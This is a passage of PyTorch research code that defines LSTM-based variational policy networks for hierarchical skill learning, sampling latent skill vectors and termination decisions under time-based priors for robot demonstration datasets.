elif elapsed_t>=skill_time_limit:
if self.args.var_skill_length:
prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
else:
# Random
prior_value[0,1]=0.
# If less than typical.
else:
# Continue.
prior_value[0,0]=1.
return prior_value
def get_actions(self, input, greedy=False, epsilon=0.001, delta_t=0, batch_size=None):
if batch_size is None:
batch_size = self.batch_size
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
latent_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# We should be multiply by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
############################################
prior_value = self.get_prior_value(delta_t)
# Now... add prior value.
# Only need to do this to the last timestep... because the last sampled b is going to be copied into a different variable that is stored.
latent_b_preprobabilities[-1, :, :] += prior_value
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Sample b.
selected_b = self.select_greedy_action(latent_b_probabilities)
############################################
# Now implementing hard constrained b selection.
if delta_t < self.min_skill_time:
# Continue. Set b to 0.
selected_b[-1] = 0.
elif (self.min_skill_time <= delta_t) and (delta_t < self.max_skill_time):
pass
else:
# Stop and select a new z. Set b to 1.
selected_b[-1] = 1.
# Also get z... assume higher level funciton handles the new z selection component.
if greedy==True:
selected_z = mean_outputs
else:
selected_z = self.dists.sample()
return selected_b, selected_z
def incremental_reparam_get_actions(self, input, greedy=False, action_epsilon=0.001, hidden=None, previous_z=None, delta_t=0):
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
outputs, hidden = self.lstm(format_input, hidden)
latent_b_preprobabilities = self.termination_output_layer(outputs)
############################################
# GET PRIOR AND ADD.
prior_value = self.get_prior_value(delta_t)
latent_b_preprobabilities[-1, :, :] += prior_value
############################################
latent_b_probabilities = self.batch_softmax_layer(latent_b_preprobabilities).squeeze(1)
# Greedily select b.
selected_b = self.select_greedy_action(latent_b_probabilities)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# We should be multiply by self.variance_factor.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + action_epsilon
noise = torch.randn_like(variance_outputs)
if greedy:
selected_z = mean_outputs
else:
# Instead of *sampling* the action from a distribution, construct using mu + sig * eps (random noise).
selected_z = mean_outputs + variance_outputs * noise
# If single input and previous_Z is None, this is the first timestep. So set b to 1, and don't do anything to z.
if input.shape[0]==1 and previous_z is None:
selected_b[0] = 1
# If previous_Z is not None, this is not the first timestep, so don't do anything to z. If b is 0, use previous.
elif input.shape[0]==1 and previous_z is not None:
if selected_b==0:
selected_z = previous_z
elif input.shape[0]>1:
# Now modify z's as per New Z Selection.
# Set initial b to 1.
selected_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if selected_b[t]==0:
selected_z[t] = selected_z[t-1]
return selected_z, selected_b, hidden
class VariationalPolicyNetwork(PolicyNetwork_BaseClass):
# Policy Network inherits from torch.nn.Module.
# Now we overwrite the init, forward functions. And define anything else that we need.
# def __init__(self, input_size, hidden_size, number_subpolicies, number_layers=4, z_exploration_bias=0., b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, number_subpolicies, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(VariationalPolicyNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.number_subpolicies = number_subpolicies
self.output_size = number_subpolicies
self.num_layers = number_layers
self.z_exploration_bias = self.args.z_exploration_bias
self.b_exploration_bias = self.args.b_exploration_bias
self.z_probability_factor = self.args.z_probability_factor
self.b_probability_factor = self.args.b_probability_factor
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True)
# Transform to output space - Latent z and Latent b.
# THIS OUTPUT LAYER TAKES 2*HIDDEN SIZE as input because it's bidirectional.
self.subpolicy_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.termination_output_layer = torch.nn.Linear(2*self.hidden_size,2)
# Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=2)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=2)
def sample_latent_variables(self, subpolicy_outputs, termination_output_layer):
# Run sampling layers.
sample_z = self.sample_action(subpolicy_outputs)
sample_b = self.sample_action(termination_output_layer)
return sample_z, sample_b
def sample_latent_variables_epsilon_greedy(self, subpolicy_outputs, termination_output_layer, epsilon):
sample_z = self.select_epsilon_greedy_action(subpolicy_outputs, epsilon)
sample_b = self.select_epsilon_greedy_action(termination_output_layer, epsilon)
return sample_z, sample_b
def forward(self, input, epsilon, new_z_selection=True):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_z_preprobabilities = self.subpolicy_output_layer(outputs)*self.z_probability_factor + self.z_exploration_bias
# variational_b_preprobabilities = self.termination_output_layer(outputs) + self.b_exploration_bias
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Add b continuation bias to the continuing option at every timestep.
variational_b_preprobabilities[:,0,0] += self.b_exploration_bias
variational_z_probabilities = self.batch_softmax_layer(variational_z_preprobabilities).squeeze(1)
variational_b_probabilities = self.batch_softmax_layer(variational_b_preprobabilities).squeeze(1)
variational_z_logprobabilities = self.batch_logsoftmax_layer(variational_z_preprobabilities).squeeze(1)
variational_b_logprobabilities = self.batch_logsoftmax_layer(variational_b_preprobabilities).squeeze(1)
# sampled_z_index, sampled_b = self.sample_latent_variables(variational_z_probabilities, variational_b_probabilities)
sampled_z_index, sampled_b = self.sample_latent_variables_epsilon_greedy(variational_z_probabilities, variational_b_probabilities, epsilon)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# # Trying cheeky thing to see if we can learn in this setting.
# sampled_b[1:] = 0
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
return sampled_z_index, sampled_b, variational_b_logprobabilities,\
variational_z_logprobabilities, variational_b_probabilities, variational_z_probabilities, None
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
# Sampling can handle batched action_probabilities.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample()
return sample_action
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
# NEED TO USE DIMENSION OF ARGMAX.
return action_probabilities.argmax(dim=-1)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
epsilon = epsilon
# if np.random.random()<epsilon:
# # return(np.random.randint(0,high=len(action_probabilities)))
# return self.sample_action(action_probabilities)
# else:
# return self.select_greedy_action(action_probabilities)
# Issue with the current implementation is that it selects either sampling or greedy selection identically across the entire batch.
# This is stupid, use a toch.where instead?
# Sample an array of binary variables of size = batch size.
# For each, use greedy or ...
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
def sample_termination(self, termination_probability):
sample_terminal = torch.distributions.Bernoulli(termination_probability).sample().squeeze(0)
return sample_terminal
class ContinuousVariationalPolicyNetwork(PolicyNetwork_BaseClass):
# def __init__(self, input_size, hidden_size, z_dimensions, number_layers=4, z_exploration_bias=0., b_exploration_bias=0., batch_size=1):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
# super().__init__()
super(ContinuousVariationalPolicyNetwork, self).__init__()
self.args = args
self.input_size = input_size
self.hidden_size = hidden_size
self.output_size = z_dimensions
self.num_layers = number_layers
self.z_exploration_bias = self.args.z_exploration_bias
self.b_exploration_bias = self.args.b_exploration_bias
self.z_probability_factor = self.args.z_probability_factor
self.b_probability_factor = self.args.b_probability_factor
self.batch_size = self.args.batch_size
# Define a bidirectional LSTM now.
self.lstm = torch.nn.LSTM(input_size=self.input_size,hidden_size=self.hidden_size,num_layers=self.num_layers, bidirectional=True, dropout=self.args.dropout)
# Transform to output space - Latent z and Latent b.
# THIS OUTPUT LAYER TAKES 2*HIDDEN SIZE as input because it's bidirectional.
self.termination_output_layer = torch.nn.Linear(2*self.hidden_size,2)
# Softmax activation functions for Bernoulli termination probability and latent z selection .
self.batch_softmax_layer = torch.nn.Softmax(dim=-1)
self.batch_logsoftmax_layer = torch.nn.LogSoftmax(dim=-1)
# Define output layers for the LSTM, and activations for this output layer.
self.mean_output_layer = torch.nn.Linear(2*self.hidden_size,self.output_size)
self.variances_output_layer = torch.nn.Linear(2*self.hidden_size, self.output_size)
self.activation_layer = torch.nn.Tanh()
self.variance_activation_layer = torch.nn.Softplus()
self.variance_activation_bias = 0.
self.variance_factor = 0.01
def forward(self, input, epsilon, new_z_selection=True, var_epsilon=0.001):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Add b continuation bias to the continuing option at every timestep.
variational_b_preprobabilities[:,0,0] += self.b_exploration_bias
variational_b_probabilities = self.batch_softmax_layer(variational_b_preprobabilities).squeeze(1)
variational_b_logprobabilities = self.batch_logsoftmax_layer(variational_b_preprobabilities).squeeze(1)
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + var_epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
sampled_b = self.select_epsilon_greedy_action(variational_b_probabilities, epsilon)
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.reparam:
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
else:
sampled_z_index = self.dists.sample().squeeze(1)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
# if self.args.debug:
# print("#################################")
# print("Embedding in Variational Network.")
# embed()
return sampled_z_index, sampled_b, variational_b_logprobabilities,\
variational_z_logprobabilities, variational_b_probabilities, variational_z_probabilities, kl_divergence, prior_loglikelihood
def sample_action(self, action_probabilities):
# Categorical distribution sampling.
# Sampling can handle batched action_probabilities.
sample_action = torch.distributions.Categorical(probs=action_probabilities).sample()
return sample_action
def select_greedy_action(self, action_probabilities):
# Select action with max probability for test time.
# NEED TO USE DIMENSION OF ARGMAX.
return action_probabilities.argmax(dim=-1)
def select_epsilon_greedy_action(self, action_probabilities, epsilon=0.1):
epsilon = epsilon
# if np.random.random()<epsilon:
# # return(np.random.randint(0,high=len(action_probabilities)))
# return self.sample_action(action_probabilities)
# else:
# return self.select_greedy_action(action_probabilities)
# Issue with the current implementation is that it selects either sampling or greedy selection identically across the entire batch.
# This is stupid, use a toch.where instead?
# Sample an array of binary variables of size = batch size.
# For each, use greedy or ...
whether_greedy = torch.rand(action_probabilities.shape[0]).to(device)
sample_actions = torch.where(whether_greedy<epsilon, self.sample_action(action_probabilities), self.select_greedy_action(action_probabilities))
return sample_actions
class ContinuousVariationalPolicyNetwork_BPrior(ContinuousVariationalPolicyNetwork):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousVariationalPolicyNetwork_BPrior, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
def get_prior_value(self, elapsed_t, max_limit=5):
skill_time_limit = max_limit-1
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose length of 12-16 with certain probabilities.
lens = np.array([12,13,14,15,16])
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
prior_value = torch.zeros((1,2)).to(device).float()
# If at or over hard limit.
if elapsed_t>=max_limit:
prior_value[0,1]=1.
# If at or more than typical, less than hard limit:
elif elapsed_t>=skill_time_limit:
if self.args.var_skill_length:
prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
else:
# Random
prior_value[0,1]=0.
# If less than typical.
else:
# Continue.
prior_value[0,0]=1.
return prior_value
def forward(self, input, epsilon, new_z_selection=True):
# Input Format must be: Sequence_Length x 1 x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
prev_time = 0
# Create variables for prior and probs.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
sampled_b = torch.zeros(input.shape[0]).to(device).int()
sampled_b[0] = 1
for t in range(1,input.shape[0]):
# Compute prior value.
delta_t = t-prev_time
# if self.args.debug:
# print("##########################")
# print("Time: ",t, " Prev Time:",prev_time, " Delta T:",delta_t)
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length)
# Construct probabilities.
variational_b_probabilities[t,0,:] = self.batch_softmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
variational_b_logprobabilities[t,0,:] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
sampled_b[t] = self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)
if sampled_b[t]==1:
prev_time = t
# if self.args.debug:
# print("Sampled b:",sampled_b[t])
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.reparam:
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
else:
sampled_z_index = self.dists.sample().squeeze(1)
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
class ContinuousVariationalPolicyNetwork_ConstrainedBPrior(ContinuousVariationalPolicyNetwork_BPrior):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4):
# Ensures inheriting from torch.nn.Module goes nicely and cleanly.
super(ContinuousVariationalPolicyNetwork_ConstrainedBPrior, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
self.min_skill_time = 12
self.max_skill_time = 16
else:
self.min_skill_time = 4
self.max_skill_time = 6
def forward(self, input, epsilon, new_z_selection=True, batch_size=1):
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], self.batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
# Create variables for prior and probabilities.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
#######################################
################ Set B ################
#######################################
# Set the first b to 1, and the time b was == 1.
sampled_b = torch.zeros(input.shape[0]).to(device).int()
# Changing to batching..
sampled_b = torch.zeros(input.shape[0], self.args.batch_size).to(device).int()
sampled_b[0] = 1
prev_time = 0
for t in range(1,input.shape[0]):
# Compute time since the last b occurred.
delta_t = t-prev_time
# Compute prior value.
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length)
# Construct probabilities.
variational_b_probabilities[t,0,:] = self.batch_softmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
variational_b_logprobabilities[t,0,:] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t,0] + prior_values[t,0])
# Now Implement Hard Restriction on Selection of B's.
if delta_t < self.min_skill_time:
# Set B to 0. I.e. Continue.
# variational_b_probabilities[t,0,:] = variational_b_probabilities[t,0,:]*0
# variational_b_probabilities[t,0,0] += 1
sampled_b[t] = 0.
elif (self.min_skill_time <= delta_t) and (delta_t < self.max_skill_time):
# Sample b.
sampled_b[t] = self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)
elif self.max_skill_time <= delta_t:
# Set B to 1. I.e. select new z.
sampled_b[t] = 1.
# If b is 1, set the previous time to now.
if sampled_b[t]==1:
prev_time = t
#######################################
################ Set Z ################
#######################################
# Now set the z's. If greedy, just return the means.
if epsilon==0.:
sampled_z_index = mean_outputs.squeeze(1)
# If not greedy, then reparameterize.
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
if self.args.train:
noise = torch.randn_like(variance_outputs)
# Instead of *sampling* the latent z from a distribution, construct using mu + sig * eps (random noise).
sampled_z_index = mean_outputs + variance_outputs*noise
# Ought to be able to pass gradients through this latent_z now.
sampled_z_index = sampled_z_index.squeeze(1)
# If evaluating, greedily get action.
else:
sampled_z_index = mean_outputs.squeeze(1)
# Modify z's based on whether b was 1 or 0. This part should remain the same.
if new_z_selection:
# Set initial b to 1.
sampled_b[0] = 1
# Initial z is already trivially set.
for t in range(1,input.shape[0]):
# If b_t==0, just use previous z.
# If b_t==1, sample new z. Here, we've cloned this from sampled_z's, so there's no need to do anything.
if sampled_b[t]==0:
sampled_z_index[t] = sampled_z_index[t-1]
# Also compute logprobabilities of the latent_z's sampled from this net.
variational_z_logprobabilities = self.dists.log_prob(sampled_z_index.unsqueeze(1))
variational_z_probabilities = None
# Set standard distribution for KL.
self.standard_distribution = torch.distributions.MultivariateNormal(torch.zeros((self.output_size)).to(device),torch.eye((self.output_size)).to(device))
# Compute KL.
kl_divergence = torch.distributions.kl_divergence(self.dists, self.standard_distribution)
# Prior loglikelihood
prior_loglikelihood = self.standard_distribution.log_prob(sampled_z_index)
if self.args.debug:
print("#################################")
print("Embedding in Variational Network.")
embed()
return sampled_z_index, sampled_b, variational_b_logprobabilities.squeeze(1), \
variational_z_logprobabilities, variational_b_probabilities.squeeze(1), variational_z_probabilities, kl_divergence, prior_loglikelihood
class ContinuousVariationalPolicyNetwork_Batch(ContinuousVariationalPolicyNetwork_ConstrainedBPrior):
def __init__(self, input_size, hidden_size, z_dimensions, args, number_layers=4, translation_network=False):
super(ContinuousVariationalPolicyNetwork_Batch, self).__init__(input_size, hidden_size, z_dimensions, args, number_layers)
self.translation_network = translation_network
def get_prior_value(self, elapsed_t, max_limit=5, batch_size=None):
if batch_size==None:
batch_size = self.batch_size
skill_time_limit = max_limit-1
if self.args.data=='MIME' or self.args.data=='Roboturk' or self.args.data=='OrigRoboturk' or self.args.data=='FullRoboturk' or self.args.data=='Mocap':
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# Choose length of 12-16 with certain probabilities.
lens = np.array([12,13,14,15,16])
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 16
skill_time_limit = 12
else:
max_limit = 20
skill_time_limit = max_limit-1
else:
# If allowing variable skill length, set length for this sample.
if self.args.var_skill_length:
# probabilities = np.array([0.1,0.2,0.4,0.2,0.1])
prob_biases = np.array([[0.8,0.],[0.4,0.],[0.,0.],[0.,0.4]])
max_limit = 6
skill_time_limit = 4
else:
max_limit = 5
skill_time_limit = max_limit-1
# Compute elapsed time - skill time limit.
delt = elapsed_t-skill_time_limit
# Initialize prior vlaues.
prior_value = torch.zeros((batch_size,2)).to(device).float()
# Since we're evaluating multiple conditions over the batch, don't do this with if-else structures.
# Instead, set values of prior based on which of the following cases they fall into.
# print("Embedding in prior computation!")
# print("TIME: ",elapsed_t)
# print("Prior: ",prior_value)
# embed()
######################################
# CASE 1: If we're at / over the max limit:
######################################
condition_1 = torch.tensor((elapsed_t>=max_limit).astype(int)).to(device).float()
case_1_block = np.array([[0,1]])
case_1_value = torch.tensor(np.repeat(case_1_block, batch_size, axis=0)).to(device).float()
######################################
# CASE 2: If we're not over max limt, but at/ over the typical skill time length.
######################################
condition_2 = torch.tensor((elapsed_t>=skill_time_limit).astype(int)*(elapsed_t<max_limit).astype(int)).to(device).float()
sel_indices = np.where(elapsed_t>=skill_time_limit)[0]
intermediate_values = np.min([np.ones_like(delt,dtype=int)*3,np.max([np.zeros_like(delt,dtype=int),delt.astype(int)],axis=0)],axis=0)
# Create basic building block that's going to repeat, that we use for the var_skill_length=0 case.
block = np.array([[0,1]])
block_repeat = np.repeat(block, batch_size, axis=0)
# Create array that sets values based on var_skill_length cases.
case_2_value = torch.tensor((self.args.var_skill_length*prob_biases[intermediate_values]) + \
(1-self.args.var_skill_length)*block_repeat).to(device).float()
######################################
# CASE 3: If we're not over either the max limit or the typical skill time length.
######################################
condition_3 = torch.tensor((elapsed_t<skill_time_limit).astype(int)).to(device).float()
case_3_block = np.array([[1,0]])
case_3_value = torch.tensor(np.repeat(case_3_block, batch_size, axis=0)).to(device).float()
######################################
# Now set the prior values.
######################################
prior_value = condition_1.unsqueeze(1)*case_1_value + condition_2.unsqueeze(1)*case_2_value + condition_3.unsqueeze(1)*case_3_value
# Now return prior value.
return prior_value
####################################
####################################
# Unbatched prior computation.
# # If at or over hard limit.
# if elapsed_t>=max_limit:
# prior_value[0,1]=1.
# # If at or more than typical, less than hard limit:
# elif elapsed_t>=skill_time_limit:
# if self.args.var_skill_length:
# prior_value[0] = torch.tensor(prob_biases[elapsed_t-skill_time_limit]).to(device).float()
# else:
# # Random
# prior_value[0,1]=0.
# # If less than typical.
# else:
# # Continue.
# prior_value[0,0]=1.
# return prior_value
####################################
####################################
# @gpu_profile
# @tprofile(immediate=True)
def forward(self, input, epsilon, new_z_selection=True, batch_size=None, batch_trajectory_lengths=None, precomputed_b=None, evaluate_z_probability=None):
##################################################
##################### Set A ######################
##################################################
if batch_size is None:
batch_size = self.batch_size
##################################################
# Pass through base LSTM.
##################################################
# Input Format must be: Sequence_Length x Batch_Size x Input_Size.
format_input = input.view((input.shape[0], batch_size, self.input_size))
hidden = None
outputs, hidden = self.lstm(format_input)
##################################################
# If usual variational network, predict b's.
##################################################
if not(self.translation_network):
# Damping factor for probabilities to prevent washing out of bias.
variational_b_preprobabilities = self.termination_output_layer(outputs)*self.b_probability_factor
# Create variables for prior and probabilities.
prior_values = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_probabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
variational_b_logprobabilities = torch.zeros_like(variational_b_preprobabilities).to(device).float()
##################################################
# Predict latent z's.
##################################################
# Predict Gaussian means and variances.
if self.args.mean_nonlinearity:
mean_outputs = self.activation_layer(self.mean_output_layer(outputs))
else:
mean_outputs = self.mean_output_layer(outputs)
# Still need a softplus activation for variance because needs to be positive.
variance_outputs = self.variance_factor*(self.variance_activation_layer(self.variances_output_layer(outputs))+self.variance_activation_bias) + epsilon
# This should be a SET of distributions.
self.dists = torch.distributions.MultivariateNormal(mean_outputs, torch.diag_embed(variance_outputs))
##################################################
##################### Set B ######################
##################################################
if not(self.translation_network):
##################################################
# Initialize b's.
##################################################
# Set the first b to 1, and the time b was == 1.
# sampled_b = torch.zeros(input.shape[0]).to(device).int()
# Changing to batching..
sampled_b = torch.zeros(input.shape[0], batch_size).to(device).int()
sampled_b[0] = 1
prev_time = np.zeros((batch_size))
##################################################
# Iterate over time and get b's.
##################################################
for t in range(1,input.shape[0]):
# Compute time since the last b occurred.
delta_t = t-prev_time
# Compute prior value.
# print("SAMPLED B: ", sampled_b[:t])
prior_values[t] = self.get_prior_value(delta_t, max_limit=self.args.skill_length, batch_size=batch_size)
# Construct probabilities.
variational_b_probabilities[t] = self.batch_softmax_layer(variational_b_preprobabilities[t] + prior_values[t])
variational_b_logprobabilities[t] = self.batch_logsoftmax_layer(variational_b_preprobabilities[t] + prior_values[t])
############################
# Batching versions of implementing hard restriction of selection of B's.
############################
# CASE 1: If we haven't reached the minimum skill execution time.
condition_1 = torch.tensor((delta_t<self.min_skill_time).astype(int)).to(device)
# CASE 2: If execution time is over the minimum skill execution time, but less than the maximum:
condition_2 = torch.tensor((delta_t>=self.min_skill_time).astype(int)*(delta_t<self.max_skill_time).astype(int)).to(device)
# CASE 3: If we have reached the maximum skill execution time.
condition_3 = torch.tensor((delta_t>=self.max_skill_time).astype(int)).to(device)
sampled_b[t] = condition_1*torch.zeros(1).to(device).float() + (condition_2*self.select_epsilon_greedy_action(variational_b_probabilities[t:t+1], epsilon)).squeeze(0) + \
condition_3*torch.ones(1).to(device).float()
# Now if sampled_b[t] ==1, set the prev_time of that batch element to current time t.
# Otherwise, let prev_time stay prev_time.
# Maybe a safer way to execute this:
prev_time[(torch.where(sampled_b[t]==1)[0]).cpu().detach().numpy()] = t
else:
# Here, we didn't need to actually compute b's. So just assign them from precomputed ones.
sampled_b = precomputed_b.detach()
##################################################
##################### Set Z ######################
##################################################
##################################################
# Get initial z predictions.
##################################################
# Now set the z's. If greedy, just return the means.
if epsilon==0. or not(self.args.train):
sampled_z_index = mean_outputs.squeeze(1)
# If not greedy, then reparameterize.
else:
# Whether to use reparametrization trick to retrieve the latent_z's.
noise = torch.randn_like(variance_outputs)
